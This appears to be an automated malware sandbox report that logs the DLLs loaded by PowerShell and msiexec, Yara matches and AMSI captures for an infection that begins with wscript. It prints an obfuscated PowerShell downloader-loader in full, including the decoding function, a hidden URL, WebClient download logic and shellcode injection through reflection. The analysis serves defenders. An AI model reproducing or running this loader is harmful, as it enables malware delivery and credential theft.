              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rstrtmgr.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: pstorec.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: vaultcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: pstorec.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5 source: powershell.exe, 00000004.00000002.2477154181.00000000079A7000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.2477154181.00000000079CC000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: tem.Core.pdb source: powershell.exe, 00000004.00000002.2447632950.00000000033DE000.00000004.00000020.00020000.00000000.sdmp

              Data Obfuscation

              barindex
              Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: ShellExecute("Powershell.exe", "" <#Offentlighedslovgivninger Raakremer", "", "", "0");
              Source: Yara matchFile source: 00000004.00000002.2487017781.000000000AA58000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.2486808594.0000000008E10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.2468395369.000000000609A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.2280629575.000001DB5A7CE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64string($Biplosive165)$GLobAL:sKAffernE = [sYstem.TExt.eNCodING]::AsCiI.geTsTRing($KvaNtITeTsMssIGe)$gLOBAl:REndestenEN=$skafFernE.suBsTriNG($pREFerTilIzAtioN,$wAVenUmBEr1)<#ledtogenes Gratta
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Humoristics $Corynteria $Pluralise), (Dydsiret @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Antibromic = [AppDomain]::CurrentDomain.GetAssemblies()$glob
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Hubbell159)), $yuckiest).DefineDynamicModule($Endrin, $false).DefineType($Effusive, $Theatricalization91, [System.MulticastDelegate])$
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64string($Biplosive165)$GLobAL:sKAffernE = [sYstem.TExt.eNCodING]::AsCiI.geTsTRing($KvaNtITeTsMssIGe)$gLOBAl:REndestenEN=$skafFernE.suBsTriNG($pREFerTilIzAtioN,$wAVenUmBEr1)<#ledtogenes Gratta
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Offentlighedslovgivninger Raakremers Miljforstyrrelserne Daarligst Coniferous #>;$selsret='Valgets';<#Glattede Microscopal Jordvarmeanlggets Confirmatory Onerative Rheobase #>;$Dks=$Leuma+$host.UI;If ($Dks) {$syltetjskrukke++;}function Capulet43($Blimpishly){$Unvomitednefficiencies=$Berendo+$Blimpishly.'Length'-$syltetjskrukke; for( $Unvomited=3;$Unvomited -lt $Unvomitednefficiencies;$Unvomited+=4){$Mythol++;$Overpositiveness+=$Blimpishly[$Unvomited];$Fatalismens='Usurption';}$Overpositiveness;}function Donought($Folkeskolerne){ & ($afire) ($Folkeskolerne);}$Prestigiously100=Capulet43 'BloMCheo rz dei MulDerlsvia En/Ret ';$Prestigiously100+=Capulet43 'Ca 5Kae. Mo0sk I,d(D pWGa.isvune.edBodoOpdwConsCre Ph,N K.T ac b m1Nob0Fol. ,a0di ;Met RbdW ,ai,tin.or6 No4Bou;Tr, Tex .a6N t4 Un;Ret sp.rCouvF l:No,1In 3 Mi1Eld.Par0Al.)Tur GerGMyresrncAssk Bro De/B g2Tat0B r1Bro0 s 0P.r1Rev0Unm1.ro OrrFGl iBegr Que.rofOrio Opxmav/T,r1Kin3U e1 sk.Mic0Jos ';$Extrality=Capulet43 ' yguseksDefefi R Af-Am,AOpsgTrvetraNTret .n ';$Dolkhalerne=Capulet43 'Naph HatLvhtPropFu.:Bef/Ter/GyslsemnFem6BokbEl,9sub.Unes UnhVe oegap os/RalaQuimrecy.edkD.thsukRL ec BiMRet/ FlR ReeDigdsteoZn b relseliConn,ingPhi.Fo pPrissbed ,o ';$Unvomitednddelingens=Capulet43 'P.a> si ';$afire=Capulet43 'BilIEupEsp XE,t ';$Ceratitidae='goldsmithing';$Udskrivningsprogrammets='\Enspnderen.rep';Donought (Capulet43 'sun$GraG ,oLHenOTomB ekaA rL Uf: ,aMR,sEDiadEnsIBlgCC liBioN LnE,ar=Ple$P geWo,nYv vnav:s cAUdspHiePBesDMisAEuttsmaA T,+Eph$Fa URygdPies.ymK laR GliBayvLisnAzoI KoNskrg RisRdlpsalRRygoD sG E R .yA ChmlapMMule .rTMo s la ');Donought (Capulet43 'spi$UdmgCrilManO urBIm.a lmL Fo:Park WoOMe nInsssv oFolL siiEksdT aEFilr iqIMurnc.aGC,s=Eja$DegD Beos.plslaksarHOstaParLTile U RfirNspje Fu. issLizPUnplPeriK fTMul( y$ PoUArbN unvBuro,remsayiFletB,lEOs DB nn RedsotDGr.EsimLBeniOveNFi gProE NonNevsBge)Red ');Donought (Capulet43 'Cyk[L,nnHypERenT od. s sF.nECauRLynvDatIMa cMulescep jaoProI spnNontTemMHj AImpn.veACapgTacEEquR Re]De :,mp:Ra,sM seModc enUVinrD ciC ltAmpyGripGriRRoro HetHanO H C B ORe l.og En =r r pit[Inan isE NoTsk..AutsNatEFl c R U D RTraI.abT esYM.gP nrM no agT e OObdC ysoF iLBrst say,aspAdeeUbe]Gro:sem:Ka tsp Ls isPou1 La2 a ');$Dolkhalerne=$Konsolidering[0];$skovskadens177=(Capulet43 ' st$TilgP slHa Om sbI.da P LR v: aFMu.ONond BafLansN nT,ndEHypRkonNAftE elss a= HvnHocE OswFib-sa,oshiBsubj CrER dC eaTG r ErysCurY ,gsValtUndE t,mDoc.UnvN.paE FotK.n.IntW sye keB uc I L ri roeZenn ReTCou ');Donought ($skovskadens177);Donought (Capulet43 'Acc$MasfunpoOpbdUnsfOptsun t Aresk rHy n nueAfdsCa . H H.rseAfgaG odKnie InrbarsGry[In $P oEUn xD ttVierArtaUfolFriiVoctC uyPre] .t=Ena$ L,PTo,rE.beForsKu tApoiNongCo,iTetoshiuDa sIn.l.alysla1ste0 Ab0Raa ');$Taarnfalkes=Capulet43 'K e$KryfDhuoProdFrsf .asMeutvereFrorskrnUdbeVens rg.FraDT ao PowkacnUdblskrorepa skd saFMo i RelBl
              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Offentlighedslovgivninger Raakremers Miljforstyrrelserne Daarligst Coniferous #>;$selsret='Valgets';<#Glattede Microscopal Jordvarmeanlggets Confirmatory Onerative Rheobase #>;$Dks=$Leuma+$host.UI;If ($Dks) {$syltetjskrukke++;}function Capulet43($Blimpishly){$Unvomitednefficiencies=$Berendo+$Blimpishly.'Length'-$syltetjskrukke; for( $Unvomited=3;$Unvomited -lt $Unvomitednefficiencies;$Unvomited+=4){$Mythol++;$Overpositiveness+=$Blimpishly[$Unvomited];$Fatalismens='Usurption';}$Overpositiveness;}function Donought($Folkeskolerne){ & ($afire) ($Folkeskolerne);}$Prestigiously100=Capulet43 'BloMCheo rz dei MulDerlsvia En/Ret ';$Prestigiously100+=Capulet43 'Ca 5Kae. Mo0sk I,d(D pWGa.isvune.edBodoOpdwConsCre Ph,N K.T ac b m1Nob0Fol. ,a0di ;Met RbdW ,ai,tin.or6 No4Bou;Tr, Tex .a6N t4 Un;Ret sp.rCouvF l:No,1In 3 Mi1Eld.Par0Al.)Tur GerGMyresrncAssk Bro De/B g2Tat0B r1Bro0 s 0P.r1Rev0Unm1.ro OrrFGl iBegr Que.rofOrio Opxmav/T,r1Kin3U e1 sk.Mic0Jos ';$Extrality=Capulet43 ' yguseksDefefi R Af-Am,AOpsgTrvetraNTret .n ';$Dolkhalerne=Capulet43 'Naph HatLvhtPropFu.:Bef/Ter/GyslsemnFem6BokbEl,9sub.Unes UnhVe oegap os/RalaQuimrecy.edkD.thsukRL ec BiMRet/ FlR ReeDigdsteoZn b relseliConn,ingPhi.Fo pPrissbed ,o ';$Unvomitednddelingens=Capulet43 'P.a> si ';$afire=Capulet43 'BilIEupEsp XE,t ';$Ceratitidae='goldsmithing';$Udskrivningsprogrammets='\Enspnderen.rep';Donought (Capulet43 'sun$GraG ,oLHenOTomB ekaA rL Uf: ,aMR,sEDiadEnsIBlgCC liBioN LnE,ar=Ple$P geWo,nYv vnav:s cAUdspHiePBesDMisAEuttsmaA T,+Eph$Fa URygdPies.ymK laR GliBayvLisnAzoI KoNskrg RisRdlpsalRRygoD sG E R .yA ChmlapMMule .rTMo s la ');Donought (Capulet43 'spi$UdmgCrilManO urBIm.a lmL Fo:Park WoOMe nInsssv oFolL siiEksdT aEFilr iqIMurnc.aGC,s=Eja$DegD Beos.plslaksarHOstaParLTile U RfirNspje Fu. issLizPUnplPeriK fTMul( y$ PoUArbN unvBuro,remsayiFletB,lEOs DB nn RedsotDGr.EsimLBeniOveNFi gProE NonNevsBge)Red ');Donought (Capulet43 'Cyk[L,nnHypERenT od. s sF.nECauRLynvDatIMa cMulescep jaoProI spnNontTemMHj AImpn.veACapgTacEEquR Re]De :,mp:Ra,sM seModc enUVinrD ciC ltAmpyGripGriRRoro HetHanO H C B ORe l.og En =r r pit[Inan isE NoTsk..AutsNatEFl c R U D RTraI.abT esYM.gP nrM no agT e OObdC ysoF iLBrst say,aspAdeeUbe]Gro:sem:Ka tsp Ls isPou1 La2 a ');$Dolkhalerne=$Konsolidering[0];$skovskadens177=(Capulet43 ' st$TilgP slHa Om sbI.da P LR v: aFMu.ONond BafLansN nT,ndEHypRkonNAftE elss a= HvnHocE OswFib-sa,oshiBsubj CrER dC eaTG r ErysCurY ,gsValtUndE t,mDoc.UnvN.paE FotK.n.IntW sye keB uc I L ri roeZenn ReTCou ');Donought ($skovskadens177);Donought (Capulet43 'Acc$MasfunpoOpbdUnsfOptsun t Aresk rHy n nueAfdsCa . H H.rseAfgaG odKnie InrbarsGry[In $P oEUn xD ttVierArtaUfolFriiVoctC uyPre] .t=Ena$ L,PTo,rE.beForsKu tApoiNongCo,iTetoshiuDa sIn.l.alysla1ste0 Ab0Raa ');$Taarnfalkes=Capulet43 'K e$KryfDhuoProdFrsf .asMeutvereFrorskrnUdbeVens rg.FraDT ao PowkacnUdblskrorepa skd saFMo i RelBl
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Offentlighedslovgivninger Raakremers Miljforstyrrelserne Daarligst Coniferous #>;$selsret='Valgets';<#Glattede Microscopal Jordvarmeanlggets Confirmatory Onerative Rheobase #>;$Dks=$Leuma+$host.UI;If ($Dks) {$syltetjskrukke++;}function Capulet43($Blimpishly){$Unvomitednefficiencies=$Berendo+$Blimpishly.'Length'-$syltetjskrukke; for( $Unvomited=3;$Unvomited -lt $Unvomitednefficiencies;$Unvomited+=4){$Mythol++;$Overpositiveness+=$Blimpishly[$Unvomited];$Fatalismens='Usurption';}$Overpositiveness;}function Donought($Folkeskolerne){ & ($afire) ($Folkeskolerne);}$Prestigiously100=Capulet43 'BloMCheo rz dei MulDerlsvia En/Ret ';$Prestigiously100+=Capulet43 'Ca 5Kae. Mo0sk I,d(D pWGa.isvune.edBodoOpdwConsCre Ph,N K.T ac b m1Nob0Fol. ,a0di ;Met RbdW ,ai,tin.or6 No4Bou;Tr, Tex .a6N t4 Un;Ret sp.rCouvF l:No,1In 3 Mi1Eld.Par0Al.)Tur GerGMyresrncAssk Bro De/B g2Tat0B r1Bro0 s 0P.r1Rev0Unm1.ro OrrFGl iBegr Que.rofOrio Opxmav/T,r1Kin3U e1 sk.Mic0Jos ';$Extrality=Capulet43 ' yguseksDefefi R Af-Am,AOpsgTrvetraNTret .n ';$Dolkhalerne=Capulet43 'Naph HatLvhtPropFu.:Bef/Ter/GyslsemnFem6BokbEl,9sub.Unes UnhVe oegap os/RalaQuimrecy.edkD.thsukRL ec BiMRet/ FlR ReeDigdsteoZn b relseliConn,ingPhi.Fo pPrissbed ,o ';$Unvomitednddelingens=Capulet43 'P.a> si ';$afire=Capulet43 'BilIEupEsp XE,t ';$Ceratitidae='goldsmithing';$Udskrivningsprogrammets='\Enspnderen.rep';Donought (Capulet43 'sun$GraG ,oLHenOTomB ekaA rL Uf: ,aMR,sEDiadEnsIBlgCC liBioN LnE,ar=Ple$P geWo,nYv vnav:s cAUdspHiePBesDMisAEuttsmaA T,+Eph$Fa URygdPies.ymK laR GliBayvLisnAzoI KoNskrg RisRdlpsalRRygoD sG E R .yA ChmlapMMule .rTMo s la ');Donought (Capulet43 'spi$UdmgCrilManO urBIm.a lmL Fo:Park WoOMe nInsssv oFolL siiEksdT aEFilr iqIMurnc.aGC,s=Eja$DegD Beos.plslaksarHOstaParLTile U RfirNspje Fu. issLizPUnplPeriK fTMul( y$ PoUArbN unvBuro,remsayiFletB,lEOs DB nn RedsotDGr.EsimLBeniOveNFi gProE NonNevsBge)Red ');Donought (Capulet43 'Cyk[L,nnHypERenT od. s sF.nECauRLynvDatIMa cMulescep jaoProI spnNontTemMHj AImpn.veACapgTacEEquR Re]De :,mp:Ra,sM seModc enUVinrD ciC ltAmpyGripGriRRoro HetHanO H C B ORe l.og En =r r pit[Inan isE NoTsk..AutsNatEFl c R U D RTraI.abT esYM.gP nrM no agT e OObdC ysoF iLBrst say,aspAdeeUbe]Gro:sem:Ka tsp Ls isPou1 La2 a ');$Dolkhalerne=$Konsolidering[0];$skovskadens177=(Capulet43 ' st$TilgP slHa Om sbI.da P LR v: aFMu.ONond BafLansN nT,ndEHypRkonNAftE elss a= HvnHocE OswFib-sa,oshiBsubj CrER dC eaTG r ErysCurY ,gsValtUndE t,mDoc.UnvN.paE FotK.n.IntW sye keB uc I L ri roeZenn ReTCou ');Donought ($skovskadens177);Donought (Capulet43 'Acc$MasfunpoOpbdUnsfOptsun t Aresk rHy n nueAfdsCa . H H.rseAfgaG odKnie InrbarsGry[In $P oEUn xD ttVierArtaUfolFriiVoctC uyPre] .t=Ena$ L,PTo,rE.beForsKu tApoiNongCo,iTetoshiuDa sIn.l.alysla1ste0 Ab0Raa ');$Taarnfalkes=Capulet43 'K e$KryfDhuoProdFrsf .asMeutvereFrorskrnUdbeVens rg.FraDT ao PowkacnUdblskrorepa skd saFMo i RelBlJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW,12_2_004044A4
